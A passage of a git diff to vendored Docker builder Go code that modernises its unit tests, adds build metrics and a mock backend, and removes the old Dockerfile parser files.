"github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/backend" + "github.com/docker/docker/api/types/container" "github.com/docker/docker/builder" + "github.com/docker/docker/builder/remotecontext" "github.com/docker/docker/pkg/archive" + "github.com/docker/go-connections/nat" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/skip" ) func TestEmptyDockerfile(t *testing.T) { @@ -16,7 +24,7 @@ func TestEmptyDockerfile(t *testing.T) { createTestTempFile(t, contextDir, builder.DefaultDockerfileName, "", 0777) - readAndCheckDockerfile(t, "emptyDockefile", contextDir, "", "The Dockerfile (Dockerfile) cannot be empty") + readAndCheckDockerfile(t, "emptyDockerfile", contextDir, "", "the Dockerfile (Dockerfile) cannot be empty") } func TestSymlinkDockerfile(t *testing.T) { @@ -38,7 +46,7 @@ func TestDockerfileOutsideTheBuildContext(t *testing.T) { contextDir, cleanup := createTestTempDir(t, "", "builder-dockerfile-test") defer cleanup() - expectedError := "Forbidden path outside the build context" + expectedError := "Forbidden path outside the build context: ../../Dockerfile ()" readAndCheckDockerfile(t, "DockerfileOutsideTheBuildContext", contextDir, "../../Dockerfile", expectedError) } @@ -53,11 +61,9 @@ func TestNonExistingDockerfile(t *testing.T) { } func readAndCheckDockerfile(t *testing.T, testName, contextDir, dockerfilePath, expectedError string) { + skip.If(t, os.Getuid() != 0, "skipping test that requires root") tarStream, err := archive.Tar(contextDir, archive.Uncompressed) - - if err != nil { - t.Fatalf("Error when creating tar stream: %s", err) - } + assert.NilError(t, err) defer func() { if err = tarStream.Close(); err != nil { @@ -65,31 +71,103 @@ func readAndCheckDockerfile(t *testing.T, testName, contextDir, dockerfilePath, } }() - context, err := builder.MakeTarSumContext(tarStream) - - if err != nil { - t.Fatalf("Error when creating tar context: %s", err) + if dockerfilePath == "" { // handled in BuildWithContext + dockerfilePath = builder.DefaultDockerfileName } - defer func() { - if err = context.Close(); err != nil { - t.Fatalf("Error when closing tar context: %s", err) - } - }() + config := backend.BuildConfig{ + Options: &types.ImageBuildOptions{Dockerfile: dockerfilePath}, + Source: tarStream, + } + _, _, err = remotecontext.Detect(config) + assert.Check(t, is.Error(err, expectedError)) +} - options := &types.ImageBuildOptions{ - Dockerfile: dockerfilePath, +func TestCopyRunConfig(t *testing.T) { + defaultEnv := []string{"foo=1"} + defaultCmd := []string{"old"} + + var testcases = []struct { + doc string + modifiers []runConfigModifier + expected *container.Config + }{ + { + doc: "Set the command", + modifiers: []runConfigModifier{withCmd([]string{"new"})}, + expected: &container.Config{ + Cmd: []string{"new"}, + Env: defaultEnv, + }, + }, + { + doc: "Set the command to a comment", + modifiers: []runConfigModifier{withCmdComment("comment", runtime.GOOS)}, + expected: &container.Config{ + Cmd: append(defaultShellForOS(runtime.GOOS), "#(nop) ", "comment"), + Env: defaultEnv, + }, + }, + { + doc: "Set the command and env", + modifiers: []runConfigModifier{ + withCmd([]string{"new"}), + withEnv([]string{"one", "two"}), + }, + expected: &container.Config{ + Cmd: []string{"new"}, + Env: []string{"one", "two"}, + }, + }, } - b := &Builder{options: options, context: context} + for _, testcase := range testcases { + runConfig := &container.Config{ + Cmd: defaultCmd, + Env: defaultEnv, + } + runConfigCopy := copyRunConfig(runConfig, testcase.modifiers...) + assert.Check(t, is.DeepEqual(testcase.expected, runConfigCopy), testcase.doc) + // Assert the original was not modified + assert.Check(t, runConfig != runConfigCopy, testcase.doc) + } - err = b.readDockerfile() +} - if err == nil { - t.Fatalf("No error when executing test: %s", testName) +func fullMutableRunConfig() *container.Config { + return &container.Config{ + Cmd: []string{"command", "arg1"}, + Env: []string{"env1=foo", "env2=bar"}, + ExposedPorts: nat.PortSet{ + "1000/tcp": {}, + "1001/tcp": {}, + }, + Volumes: map[string]struct{}{ + "one": {}, + "two": {}, + }, + Entrypoint: []string{"entry", "arg1"}, + OnBuild: []string{"first", "next"}, + Labels: map[string]string{ + "label1": "value1", + "label2": "value2", + }, + Shell: []string{"shell", "-c"}, } +} - if !strings.Contains(err.Error(), expectedError) { - t.Fatalf("Wrong error message. Should be \"%s\". Got \"%s\"", expectedError, err.Error()) - } +func TestDeepCopyRunConfig(t *testing.T) { + runConfig := fullMutableRunConfig() + copy := copyRunConfig(runConfig) + assert.Check(t, is.DeepEqual(fullMutableRunConfig(), copy)) + + copy.Cmd[1] = "arg2" + copy.Env[1] = "env2=new" + copy.ExposedPorts["10002"] = struct{}{} + copy.Volumes["three"] = struct{}{} + copy.Entrypoint[1] = "arg2" + copy.OnBuild[0] = "start" + copy.Labels["label3"] = "value3" + copy.Shell[0] = "sh" + assert.Check(t, is.DeepEqual(fullMutableRunConfig(), runConfig)) } diff --git a/vendor/github.com/docker/docker/builder/dockerfile/internals_unix.go b/vendor/github.com/docker/docker/builder/dockerfile/internals_unix.go deleted file mode 100644 index a8a47c3582..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/internals_unix.go +++ /dev/null @@ -1,38 +0,0 @@ -// +build !windows - -package dockerfile - -import ( - "os" - "path/filepath" - "strings" - - "github.com/docker/docker/pkg/system" -) - -// normaliseDest normalises the destination of a COPY/ADD command in a -// platform semantically consistent way. -func normaliseDest(cmdName, workingDir, requested string) (string, error) { - dest := filepath.FromSlash(requested) - endsInSlash := strings.HasSuffix(requested, string(os.PathSeparator)) - if !system.IsAbs(requested) { - dest = filepath.Join(string(os.PathSeparator), filepath.FromSlash(workingDir), dest) - // Make sure we preserve any trailing slash - if endsInSlash { - dest += string(os.PathSeparator) - } - } - return dest, nil -} - -func containsWildcards(name string) bool { - for i := 0; i < len(name); i++ { - ch := name[i] - if ch == '\\' { - i++ - } else if ch == '*' || ch == '?' || ch == '[' { - return true - } - } - return false -} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/internals_windows.go b/vendor/github.com/docker/docker/builder/dockerfile/internals_windows.go index f60b112049..26978b48cf 100644 --- a/vendor/github.com/docker/docker/builder/dockerfile/internals_windows.go +++ b/vendor/github.com/docker/docker/builder/dockerfile/internals_windows.go @@ -1,66 +1,7 @@ -package dockerfile +package dockerfile // import "github.com/docker/docker/builder/dockerfile" -import ( - "fmt" - "os" - "path/filepath" - "strings" +import "github.com/docker/docker/pkg/idtools" - "github.com/docker/docker/pkg/system" -) - -// normaliseDest normalises the destination of a COPY/ADD command in a -// platform semantically consistent way. -func normaliseDest(cmdName, workingDir, requested string) (string, error) { - dest := filepath.FromSlash(requested) - endsInSlash := strings.HasSuffix(dest, string(os.PathSeparator)) - - // We are guaranteed that the working directory is already consistent, - // However, Windows also has, for now, the limitation that ADD/COPY can - // only be done to the system drive, not any drives that might be present - // as a result of a bind mount. - // - // So... if the path requested is Linux-style absolute (/foo or \\foo), - // we assume it is the system drive. If it is a Windows-style absolute - // (DRIVE:\\foo), error if DRIVE is not C. And finally, ensure we - // strip any configured working directories drive letter so that it - // can be subsequently legitimately converted to a Windows volume-style - // pathname. - - // Not a typo - filepath.IsAbs, not system.IsAbs on this next check as - // we only want to validate where the DriveColon part has been supplied. - if filepath.IsAbs(dest) { - if strings.ToUpper(string(dest[0])) != "C" { - return "", fmt.Errorf("Windows does not support %s with a destinations not on the system drive (C:)", cmdName) - } - dest = dest[2:] // Strip the drive letter - } - - // Cannot handle relative where WorkingDir is not the system drive. - if len(workingDir) > 0 { - if ((len(workingDir) > 1) && !system.IsAbs(workingDir[2:])) || (len(workingDir) == 1) { - return "", fmt.Errorf("Current WorkingDir %s is not platform consistent", workingDir) - } - if !system.IsAbs(dest) { - if string(workingDir[0]) != "C" { - return "", fmt.Errorf("Windows does not support %s with relative paths when WORKDIR is not the system drive", cmdName) - } - dest = filepath.Join(string(os.PathSeparator), workingDir[2:], dest) - // Make sure we preserve any trailing slash - if endsInSlash { - dest += string(os.PathSeparator) - } - } - } - return dest, nil -} - -func containsWildcards(name string) bool { - for i := 0; i < len(name); i++ { - ch := name[i] - if ch == '*' || ch == '?' || ch == '[' { - return true - } - } - return false +func parseChownFlag(chown, ctrRootPath string, idMappings *idtools.IDMappings) (idtools.IDPair, error) { + return idMappings.RootPair(), nil } diff --git a/vendor/github.com/docker/docker/builder/dockerfile/internals_windows_test.go b/vendor/github.com/docker/docker/builder/dockerfile/internals_windows_test.go index 868a6671a3..4f00623404 100644 --- a/vendor/github.com/docker/docker/builder/dockerfile/internals_windows_test.go +++ b/vendor/github.com/docker/docker/builder/dockerfile/internals_windows_test.go @@ -1,17 +1,23 @@ // +build windows -package dockerfile +package dockerfile // import "github.com/docker/docker/builder/dockerfile" -import "testing" +import ( + "fmt" + "testing" -func TestNormaliseDest(t *testing.T) { + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestNormalizeDest(t *testing.T) { tests := []struct{ current, requested, expected, etext string }{ - {``, `D:\`, ``, `Windows does not support TEST with a destinations not on the system drive (C:)`}, - {``, `e:/`, ``, `Windows does not support TEST with a destinations not on the system drive (C:)`}, + {``, `D:\`, ``, `Windows does not support destinations not on the system drive (C:)`}, + {``, `e:/`, ``, `Windows does not support destinations not on the system drive (C:)`}, {`invalid`, `./c1`, ``, `Current WorkingDir invalid is not platform consistent`}, {`C:`, ``, ``, `Current WorkingDir C: is not platform consistent`}, {`C`, ``, ``, `Current WorkingDir C is not platform consistent`}, - {`D:\`, `.`, ``, "Windows does not support TEST with relative paths when WORKDIR is not the system drive"}, + {`D:\`, `.`, ``, "Windows does not support relative paths when WORKDIR is not the system drive"}, {``, `D`, `D`, ``}, {``, `./a1`, `.\a1`, ``}, {``, `.\b1`, `.\b1`, ``}, @@ -32,20 +38,16 @@ func TestNormaliseDest(t *testing.T) { {`C:\wdm`, `foo/bar/`, `\wdm\foo\bar\`, ``}, {`C:\wdn`, `foo\bar/`, `\wdn\foo\bar\`, ``}, } - for _, i := range tests { - got, err := normaliseDest("TEST", i.current, i.requested) - if err != nil && i.etext == "" { - t.Fatalf("TestNormaliseDest Got unexpected error %q for %s %s. ", err.Error(), i.current, i.requested) - } - if i.etext != "" && ((err == nil) || (err != nil && err.Error() != i.etext)) { - if err == nil { - t.Fatalf("TestNormaliseDest Expected an error for %s %s but didn't get one", i.current, i.requested) - } else { - t.Fatalf("TestNormaliseDest Wrong error text for %s %s - %s", i.current, i.requested, err.Error()) + for _, testcase := range tests { + msg := fmt.Sprintf("Input: %s, %s", testcase.current, testcase.requested) + actual, err := normalizeDest(testcase.current, testcase.requested, "windows") + if testcase.etext == "" { + if !assert.Check(t, err, msg) { + continue } - } - if i.etext == "" && got != i.expected { - t.Fatalf("TestNormaliseDest Expected %q for %q and %q. Got %q", i.expected, i.current, i.requested, got) + assert.Check(t, is.Equal(testcase.expected, actual), msg) + } else { + assert.Check(t, is.ErrorContains(err, testcase.etext)) } } } diff --git a/vendor/github.com/docker/docker/builder/dockerfile/metrics.go b/vendor/github.com/docker/docker/builder/dockerfile/metrics.go new file mode 100644 index 0000000000..ceafa7ad62 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/metrics.go @@ -0,0 +1,44 @@ +package dockerfile // import "github.com/docker/docker/builder/dockerfile" + +import ( + "github.com/docker/go-metrics" +) + +var ( + buildsTriggered metrics.Counter + buildsFailed metrics.LabeledCounter +) + +// Build metrics prometheus messages, these values must be initialized before +// using them. See the example below in the "builds_failed" metric definition. +const ( + metricsDockerfileSyntaxError = "dockerfile_syntax_error" + metricsDockerfileEmptyError = "dockerfile_empty_error" + metricsCommandNotSupportedError = "command_not_supported_error" + metricsErrorProcessingCommandsError = "error_processing_commands_error" + metricsBuildTargetNotReachableError = "build_target_not_reachable_error" + metricsMissingOnbuildArgumentsError = "missing_onbuild_arguments_error" + metricsUnknownInstructionError = "unknown_instruction_error" + metricsBuildCanceled = "build_canceled" +) + +func init() { + buildMetrics := metrics.NewNamespace("builder", "", nil) + + buildsTriggered = buildMetrics.NewCounter("builds_triggered", "Number of triggered image builds") + buildsFailed = buildMetrics.NewLabeledCounter("builds_failed", "Number of failed image builds", "reason") + for _, r := range []string{ + metricsDockerfileSyntaxError, + metricsDockerfileEmptyError, + metricsCommandNotSupportedError, + metricsErrorProcessingCommandsError, + metricsBuildTargetNotReachableError, + metricsMissingOnbuildArgumentsError, + metricsUnknownInstructionError, + metricsBuildCanceled, + } { + buildsFailed.WithValues(r) + } + + metrics.Register(buildMetrics) +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/mockbackend_test.go b/vendor/github.com/docker/docker/builder/dockerfile/mockbackend_test.go new file mode 100644 index 0000000000..45cba00a8c --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/mockbackend_test.go @@ -0,0 +1,148 @@ +package dockerfile // import "github.com/docker/docker/builder/dockerfile" + +import ( + "context" + "encoding/json" + "io" + "runtime" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/backend" + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/builder" + containerpkg "github.com/docker/docker/container" + "github.com/docker/docker/image" + "github.com/docker/docker/layer" + "github.com/docker/docker/pkg/containerfs" +) + +// MockBackend implements the builder.Backend interface for unit testing +type MockBackend struct { + containerCreateFunc func(config types.ContainerCreateConfig) (container.ContainerCreateCreatedBody, error) + commitFunc func(backend.CommitConfig) (image.ID, error) + getImageFunc func(string) (builder.Image, builder.ROLayer, error) + makeImageCacheFunc func(cacheFrom []string) builder.ImageCache +} + +func (m *MockBackend) ContainerAttachRaw(cID string, stdin io.ReadCloser, stdout, stderr io.Writer, stream bool, attached chan struct{}) error { + return nil +} + +func (m *MockBackend) ContainerCreate(config types.ContainerCreateConfig) (container.ContainerCreateCreatedBody, error) { + if m.containerCreateFunc != nil { + return m.containerCreateFunc(config) + } + return container.ContainerCreateCreatedBody{}, nil +} + +func (m *MockBackend) ContainerRm(name string, config *types.ContainerRmConfig) error { + return nil +} + +func (m *MockBackend) CommitBuildStep(c backend.CommitConfig) (image.ID, error) { + if m.commitFunc != nil { + return m.commitFunc(c) + } + return "", nil +} + +func (m *MockBackend) ContainerKill(containerID string, sig uint64) error { + return nil +} + +func (m *MockBackend) ContainerStart(containerID string, hostConfig *container.HostConfig, checkpoint string, checkpointDir string) error { + return nil +} + +func (m *MockBackend) ContainerWait(ctx context.Context, containerID string, condition containerpkg.WaitCondition) (<-chan containerpkg.StateStatus, error) { + return nil, nil +} + +func (m *MockBackend) ContainerCreateWorkdir(containerID string) error { + return nil +} + +func (m *MockBackend) CopyOnBuild(containerID string, destPath string, srcRoot string, srcPath string, decompress bool) error { + return nil +} + +func (m *MockBackend) GetImageAndReleasableLayer(ctx context.Context, refOrID string, opts backend.GetImageAndLayerOptions) (builder.Image, builder.ROLayer, error) { + if m.getImageFunc != nil { + return m.getImageFunc(refOrID) + } + + return &mockImage{id: "theid"}, &mockLayer{}, nil +} + +func (m *MockBackend) MakeImageCache(cacheFrom []string) builder.ImageCache { + if m.makeImageCacheFunc != nil { + return m.makeImageCacheFunc(cacheFrom) + } + return nil +} + +func (m *MockBackend) CreateImage(config []byte, parent string) (builder.Image, error) { + return nil, nil +} + +type mockImage struct { + id string + config *container.Config +} + +func (i *mockImage) ImageID() string { + return i.id +} + +func (i *mockImage) RunConfig() *container.Config { + return i.config +} + +func (i *mockImage) OperatingSystem() string { + return runtime.GOOS +} + +func (i *mockImage) MarshalJSON() ([]byte, error) { + type rawImage mockImage + return json.Marshal(rawImage(*i)) +} + +type mockImageCache struct { + getCacheFunc func(parentID string, cfg *container.Config) (string, error) +} + +func (mic *mockImageCache) GetCache(parentID string, cfg *container.Config) (string, error) { + if mic.getCacheFunc != nil { + return mic.getCacheFunc(parentID, cfg) + } + return "", nil +} + +type mockLayer struct{} + +func (l *mockLayer) Release() error { + return nil +} + +func (l *mockLayer) NewRWLayer() (builder.RWLayer, error) { + return &mockRWLayer{}, nil +} + +func (l *mockLayer) DiffID() layer.DiffID { + return layer.DiffID("abcdef") +} + +type mockRWLayer struct { +} + +func (l *mockRWLayer) Release() error { + return nil +} + +func (l *mockRWLayer) Commit() (builder.ROLayer, error) { + return nil, nil +} + +func (l *mockRWLayer) Root() containerfs.ContainerFS { + return nil +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/dumper/main.go b/vendor/github.com/docker/docker/builder/dockerfile/parser/dumper/main.go deleted file mode 100644 index fff3046fd3..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/dumper/main.go +++ /dev/null @@ -1,36 +0,0 @@ -package main - -import ( - "fmt" - "os" - - "github.com/docker/docker/builder/dockerfile/parser" -) - -func main() { - var f *os.File - var err error - - if len(os.Args) < 2 { - fmt.Println("please supply filename(s)") - os.Exit(1) - } - - for _, fn := range os.Args[1:] { - f, err = os.Open(fn) - if err != nil { - panic(err) - } - defer f.Close() - - d := parser.Directive{LookingForDirectives: true} - parser.SetEscapeToken(parser.DefaultEscapeToken, &d) - - ast, err := parser.Parse(f, &d) - if err != nil { - panic(err) - } else { - fmt.Println(ast.Dump()) - } - } -} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/json_test.go b/vendor/github.com/docker/docker/builder/dockerfile/parser/json_test.go deleted file mode 100644 index 60d74d9c36..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/json_test.go +++ /dev/null @@ -1,61 +0,0 @@ -package parser - -import ( - "testing" -) - -var invalidJSONArraysOfStrings = []string{ - `["a",42,"b"]`, - `["a",123.456,"b"]`, - `["a",{},"b"]`, - `["a",{"c": "d"},"b"]`, - `["a",["c"],"b"]`, - `["a",true,"b"]`, - `["a",false,"b"]`, - `["a",null,"b"]`, -} - -var validJSONArraysOfStrings = map[string][]string{ - `[]`: {}, - `[""]`: {""}, - `["a"]`: {"a"}, - `["a","b"]`: {"a", "b"}, - `[ "a", "b" ]`: {"a", "b"}, - `[ "a", "b" ]`: {"a", "b"}, - ` [ "a", "b" ] `: {"a", "b"}, - `["abc 123", "♥", "☃", "\" \\ \/ \b \f \n \r \t \u0000"]`: {"abc 123", "♥", "☃", "\" \\ / \b \f \n \r \t \u0000"}, -} - -func TestJSONArraysOfStrings(t *testing.T) { - for json, expected := range validJSONArraysOfStrings { - d := Directive{} - SetEscapeToken(DefaultEscapeToken, &d) - - if node, _, err := parseJSON(json, &d); err != nil { - t.Fatalf("%q should be a valid JSON array of strings, but wasn't! (err: %q)", json, err) - } else { - i := 0 - for node != nil { - if i >= len(expected) { - t.Fatalf("expected result is shorter than parsed result (%d vs %d+) in %q", len(expected), i+1, json) - } - if node.Value != expected[i] { - t.Fatalf("expected %q (not %q) in %q at pos %d", expected[i], node.Value, json, i) - } - node = node.Next - i++ - } - if i != len(expected) { - t.Fatalf("expected result is longer than parsed result (%d vs %d) in %q", len(expected), i+1, json) - } - } - } - for _, json := range invalidJSONArraysOfStrings { - d := Directive{} - SetEscapeToken(DefaultEscapeToken, &d) - - if _, _, err := parseJSON(json, &d); err != errDockerfileNotStringArray { - t.Fatalf("%q should be an invalid JSON array of strings, but wasn't!", json) - } - } -} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/line_parsers.go b/vendor/github.com/docker/docker/builder/dockerfile/parser/line_parsers.go deleted file mode 100644 index d2bf2b01b1..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/line_parsers.go +++ /dev/null @@ -1,361 +0,0 @@ -package parser - -// line parsers are dispatch calls that parse a single unit of text into a -// Node object which contains the whole statement. Dockerfiles have varied -// (but not usually unique, see ONBUILD for a unique example) parsing rules -// per-command, and these unify the processing in a way that makes it -// manageable. - -import ( - "encoding/json" - "errors" - "fmt" - "strings" - "unicode" - "unicode/utf8" -) - -var ( - errDockerfileNotStringArray = errors.New("When using JSON array syntax, arrays must be comprised of strings only.") -) - -// ignore the current argument. This will still leave a command parsed, but -// will not incorporate the arguments into the ast. -func parseIgnore(rest string, d *Directive) (*Node, map[string]bool, error) { - return &Node{}, nil, nil -} - -// used for onbuild. Could potentially be used for anything that represents a -// statement with sub-statements. -// -// ONBUILD RUN foo bar -> (onbuild (run foo bar)) -// -func parseSubCommand(rest string, d *Directive) (*Node, map[string]bool, error) { - if rest == "" { - return nil, nil, nil - } - - _, child, err := ParseLine(rest, d, false) - if err != nil { - return nil, nil, err - } - - return &Node{Children: []*Node{child}}, nil, nil -} - -// helper to parse words (i.e space delimited or quoted strings) in a statement. -// The quotes are preserved as part of this function and they are stripped later -// as part of processWords(). -func parseWords(rest string, d *Directive) []string { - const ( - inSpaces = iota // looking for start of a word - inWord - inQuote - ) - - words := []string{} - phase := inSpaces - word := "" - quote := '\000' - blankOK := false - var ch rune - var chWidth int - - for pos := 0; pos <= len(rest); pos += chWidth { - if pos != len(rest) { - ch, chWidth = utf8.DecodeRuneInString(rest[pos:]) - } - - if phase == inSpaces { // Looking for start of word - if pos == len(rest) { // end of input - break - } - if unicode.IsSpace(ch) { // skip spaces - continue - } - phase = inWord // found it, fall through - } - if (phase == inWord || phase == inQuote) && (pos == len(rest)) { - if blankOK || len(word) > 0 { - words = append(words, word) - } - break - } - if phase == inWord { - if unicode.IsSpace(ch) { - phase = inSpaces - if blankOK || len(word) > 0 { - words = append(words, word) - } - word = "" - blankOK = false - continue - } - if ch == '\'' || ch == '"' { - quote = ch - blankOK = true - phase = inQuote - } - if ch == d.EscapeToken { - if pos+chWidth == len(rest) { - continue // just skip an escape token at end of line - } - // If we're not quoted and we see an escape token, then always just - // add the escape token plus the char to the word, even if the char - // is a quote. - word += string(ch) - pos += chWidth - ch, chWidth = utf8.DecodeRuneInString(rest[pos:]) - } - word += string(ch) - continue - } - if phase == inQuote { - if ch == quote { - phase = inWord - } - // The escape token is special except for ' quotes - can't escape anything for ' - if ch == d.EscapeToken && quote != '\'' { - if pos+chWidth == len(rest) { - phase = inWord - continue // just skip the escape token at end - } - pos += chWidth - word += string(ch) - ch, chWidth = utf8.DecodeRuneInString(rest[pos:]) - } - word += string(ch) - } - } - - return words -} - -// parse environment like statements. Note that this does *not* handle -// variable interpolation, which will be handled in the evaluator. -func parseNameVal(rest string, key string, d *Directive) (*Node, map[string]bool, error) { - // This is kind of tricky because we need to support the old - // variant: KEY name value - // as well as the new one: KEY name=value ... - // The trigger to know which one is being used will be whether we hit - // a space or = first. space ==> old, "=" ==> new - - words := parseWords(rest, d) - if len(words) == 0 { - return nil, nil, nil - } - - var rootnode *Node - - // Old format (KEY name value) - if !strings.Contains(words[0], "=") { - node := &Node{} - rootnode = node - strs := tokenWhitespace.Split(rest, 2) - - if len(strs) < 2 { - return nil, nil, fmt.Errorf(key + " must have two arguments") - } - - node.Value = strs[0] - node.Next = &Node{} - node.Next.Value = strs[1] - } else { - var prevNode *Node - for i, word := range words { - if !strings.Contains(word, "=") { - return nil, nil, fmt.Errorf("Syntax error - can't find = in %q. Must be of the form: name=value", word) - } - parts := strings.SplitN(word, "=", 2) - - name := &Node{} - value := &Node{} - - name.Next = value - name.Value = parts[0] - value.Value = parts[1] - - if i == 0 { - rootnode = name - } else { - prevNode.Next = name - } - prevNode = value - } - } - - return rootnode, nil, nil -} - -func parseEnv(rest string, d *Directive) (*Node, map[string]bool, error) { - return parseNameVal(rest, "ENV", d) -} - -func parseLabel(rest string, d *Directive) (*Node, map[string]bool, error) { - return parseNameVal(rest, "LABEL", d) -} - -// parses a statement containing one or more keyword definition(s) and/or -// value assignments, like `name1 name2= name3="" name4=value`. -// Note that this is a stricter format than the old format of assignment, -// allowed by parseNameVal(), in a way that this only allows assignment of the -// form `keyword=[]` like `name2=`, `name3=""`, and `name4=value` above. -// In addition, a keyword definition alone is of the form `keyword` like `name1` -// above. And the assignments `name2=` and `name3=""` are equivalent and -// assign an empty value to the respective keywords. -func parseNameOrNameVal(rest string, d *Directive) (*Node, map[string]bool, error) { - words := parseWords(rest, d) - if len(words) == 0 { - return nil, nil, nil - } - - var ( - rootnode *Node - prevNode *Node - ) - for i, word := range words { - node := &Node{} - node.Value = word - if i == 0 { - rootnode = node - } else { - prevNode.Next = node - } - prevNode = node - } - - return rootnode, nil, nil -} - -// parses a whitespace-delimited set of arguments. The result is effectively a -// linked list of string arguments. -func parseStringsWhitespaceDelimited(rest string, d *Directive) (*Node, map[string]bool, error) { - if rest == "" { - return nil, nil, nil - } - - node := &Node{} - rootnode := node - prevnode := node - for _, str := range tokenWhitespace.Split(rest, -1) { // use regexp - prevnode = node - node.Value = str - node.Next = &Node{} - node = node.Next - } - - // XXX to get around regexp.Split *always* providing an empty string at the - // end due to how our loop is constructed, nil out the last node in the - // chain. - prevnode.Next = nil - - return rootnode, nil, nil -} - -// parsestring just wraps the string in quotes and returns a working node. -func parseString(rest string, d *Directive) (*Node, map[string]bool, error) { - if rest == "" { - return nil, nil, nil - } - n := &Node{} - n.Value = rest - return n, nil, nil -} - -// parseJSON converts JSON arrays to an AST. -func parseJSON(rest string, d *Directive) (*Node, map[string]bool, error) { - rest = strings.TrimLeftFunc(rest, unicode.IsSpace) - if !strings.HasPrefix(rest, "[") { - return nil, nil, fmt.Errorf(`Error parsing "%s" as a JSON array`, rest) - } - - var myJSON []interface{} - if err := json.NewDecoder(strings.NewReader(rest)).Decode(&myJSON); err != nil { - return nil, nil, err - } - - var top, prev *Node - for _, str := range myJSON { - s, ok := str.(string) - if !ok { - return nil, nil, errDockerfileNotStringArray - } - - node := &Node{Value: s} - if prev == nil { - top = node - } else { - prev.Next = node - } - prev = node - } - - return top, map[string]bool{"json": true}, nil -} - -// parseMaybeJSON determines if the argument appears to be a JSON array. If -// so, passes to parseJSON; if not, quotes the result and returns a single -// node. -func parseMaybeJSON(rest string, d *Directive) (*Node, map[string]bool, error) { - if rest == "" { - return nil, nil, nil - } - - node, attrs, err := parseJSON(rest, d) - - if err == nil { - return node, attrs, nil - } - if err == errDockerfileNotStringArray { - return nil, nil, err - } - - node = &Node{} - node.Value = rest - return node, nil, nil -} - -// parseMaybeJSONToList determines if the argument appears to be a JSON array. If -// so, passes to parseJSON; if not, attempts to parse it as a whitespace -// delimited string. -func parseMaybeJSONToList(rest string, d *Directive) (*Node, map[string]bool, error) { - node, attrs, err := parseJSON(rest, d) - - if err == nil { - return node, attrs, nil - } - if err == errDockerfileNotStringArray { - return nil, nil, err - } - - return parseStringsWhitespaceDelimited(rest, d) -} - -// The HEALTHCHECK command is like parseMaybeJSON, but has an extra type argument. -func parseHealthConfig(rest string, d *Directive) (*Node, map[string]bool, error) { - // Find end of first argument - var sep int - for ; sep < len(rest); sep++ { - if unicode.IsSpace(rune(rest[sep])) { - break - } - } - next := sep - for ; next < len(rest); next++ { - if !unicode.IsSpace(rune(rest[next])) { - break - } - } - - if sep == 0 { - return nil, nil, nil - } - - typ := rest[:sep] - cmd, attrs, err := parseMaybeJSON(rest[next:], d) - if err != nil { - return nil, nil, err - } - - return &Node{Value: typ, Next: cmd}, attrs, err -} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/parser.go b/vendor/github.com/docker/docker/builder/dockerfile/parser/parser.go deleted file mode 100644 index e534644491..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/parser.go +++ /dev/null @@ -1,221 +0,0 @@ -// Package parser implements a parser and parse tree dumper for Dockerfiles. -package parser - -import ( - "bufio" - "bytes" - "fmt" - "io" - "regexp" - "strings" - "unicode" - - "github.com/docker/docker/builder/dockerfile/command" -) - -// Node is a structure used to represent a parse tree. -// -// In the node there are three fields, Value, Next, and Children. Value is the -// current token's string value. Next is always the next non-child token, and -// children contains all the children. Here's an example: -// -// (value next (child child-next child-next-next) next-next) -// -// This data structure is frankly pretty lousy for handling complex languages, -// but lucky for us the Dockerfile isn't very complicated. This structure -// works a little more effectively than a "proper" parse tree for our needs. -// -type Node struct { - Value string // actual content - Next *Node // the next item in the current sexp - Children []*Node // the children of this sexp - Attributes map[string]bool // special attributes for this node - Original string // original line used before parsing - Flags []string // only top Node should have this set - StartLine int // the line in the original dockerfile where the node begins - EndLine int // the line in the original dockerfile where the node ends -} - -// Directive is the structure used during a build run to hold the state of -// parsing directives. -type Directive struct { - EscapeToken rune // Current escape token - LineContinuationRegex *regexp.Regexp // Current line contination regex - LookingForDirectives bool // Whether we are currently looking for directives - EscapeSeen bool // Whether the escape directive has been seen -} - -var ( - dispatch map[string]func(string, *Directive) (*Node, map[string]bool, error) - tokenWhitespace = regexp.MustCompile(`[\t\v\f\r ]+`) - tokenEscapeCommand = regexp.MustCompile(`^#[ \t]*escape[ \t]*=[ \t]*(?P.).*$`) - tokenComment = regexp.MustCompile(`^#.*$`) -) - -// DefaultEscapeToken is the default escape token -const DefaultEscapeToken = "\\" - -// SetEscapeToken sets the default token for escaping characters in a Dockerfile. -func SetEscapeToken(s string, d *Directive) error { - if s != "`" && s != "\\" { - return fmt.Errorf("invalid ESCAPE '%s'. Must be ` or \\", s) - } - d.EscapeToken = rune(s[0]) - d.LineContinuationRegex = regexp.MustCompile(`\` + s + `[ \t]*$`) - return nil -} - -func init() { - // Dispatch Table. see line_parsers.go for the parse functions. - // The command is parsed and mapped to the line parser. The line parser - // receives the arguments but not the command, and returns an AST after - // reformulating the arguments according to the rules in the parser - // functions. Errors are propagated up by Parse() and the resulting AST can - // be incorporated directly into the existing AST as a next. - dispatch = map[string]func(string, *Directive) (*Node, map[string]bool, error){ - command.Add: parseMaybeJSONToList, - command.Arg: parseNameOrNameVal, - command.Cmd: parseMaybeJSON, - command.Copy: parseMaybeJSONToList, - command.Entrypoint: parseMaybeJSON, - command.Env: parseEnv, - command.Expose: parseStringsWhitespaceDelimited, - command.From: parseString, - command.Healthcheck: parseHealthConfig, - command.Label: parseLabel, - command.Maintainer: parseString, - command.Onbuild: parseSubCommand, - command.Run: parseMaybeJSON, - command.Shell: parseMaybeJSON, - command.StopSignal: parseString, - command.User: parseString, - command.Volume: parseMaybeJSONToList, - command.Workdir: parseString, - } -} - -// ParseLine parses a line and returns the 